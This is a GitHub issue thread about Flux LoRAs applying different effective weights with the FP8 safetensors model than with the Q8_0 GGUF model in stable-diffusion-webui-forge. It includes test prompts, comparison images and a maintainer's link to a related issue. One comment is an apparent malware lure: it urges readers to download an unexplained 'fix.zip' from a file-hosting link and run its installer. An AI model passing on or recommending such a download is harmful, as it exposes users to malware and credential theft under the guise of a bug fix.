### ISSUE TITLE
Flux LORA weight effect differs when using Q8_0 GGUF and FP8 safetensor

### ISSUE THREAD

**Issue by blakejrobinson** [lllyasviel/stable-diffusion-webui-forge#1504]
LORAs do not seem to apply the same weights when using flux1-dev-fp8.sft as they do when using flux1-dev-Q8_0.gguf. Investigated this a bit and it seems to be happening in every LORA tried.

I picked some LORAs with obvious style changes for these examples. They're fp8 t5, Automatic Diffusion In Low Bits (not 16bit LORA)

For example, testing with the prompt 
`<lora:ZX_SpectrumFlux:0> ZX Spectrum, Pixel art, limited color palette, A field with an apple tree in the center`
flux1-dev-fp8 (top) vs flux1-dev-Q8_0 (bottom)
![flux1-dev-fp8 safetensors c](https://github.com/user-attachments/assets/3072555c-8283-4340-942b-eb8c283729c4)
![flux1-dev-Q8_0 gguf c](https://github.com/user-attachments/assets/882581d6-7551-488c-a887-3d2890471790)

Here is:
`st25style, a room with a statue in the center <lora:flux_st25style_000000800:0-3>`

flux1-dev-fp8 (top) vs flux1-dev-Q8_0 (bottom)
![flux1-dev-fp8 safetensors](https://github.com/user-attachments/assets/87e17f8f-80d1-4e93-ae38-3fba1674563e)
![flux1-dev-Q8_0 gguf](https://github.com/user-attachments/assets/330666e0-bd31-428d-b89c-a6ea13f7c37e)

And here is
`Spyyyrouuu style world, the name of this world is: Fairywood Forest, scenery, outdoors, unique color sky, hills, architecture, trees, <lora:Spyro_Worlds_Flux:0-3>`

flux1-dev-fp8 (top) vs flux1-dev-Q8_0 (bottom)
![flux1-dev-fp8 safetensors b](https://github.com/user-attachments/assets/3f732a73-a7fb-482c-b4a2-2587f515c2fc)
![flux1-dev-Q8_0 gguf b](https://github.com/user-attachments/assets/120532bf-9dcb-4637-aa83-3930015804b8)

They feel weaker on the FP8 versions - some models need 1.5 - 2x the weight to achieve the same effect.

Reporting it as other frontends were also having issues with LORA weight scaling, though things progressing so fast I can't remember the details.

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by lllyasviel** [comment]
related https://github.com/lllyasviel/stable-diffusion-webui-forge/issues/1515#issuecomment-2310358131
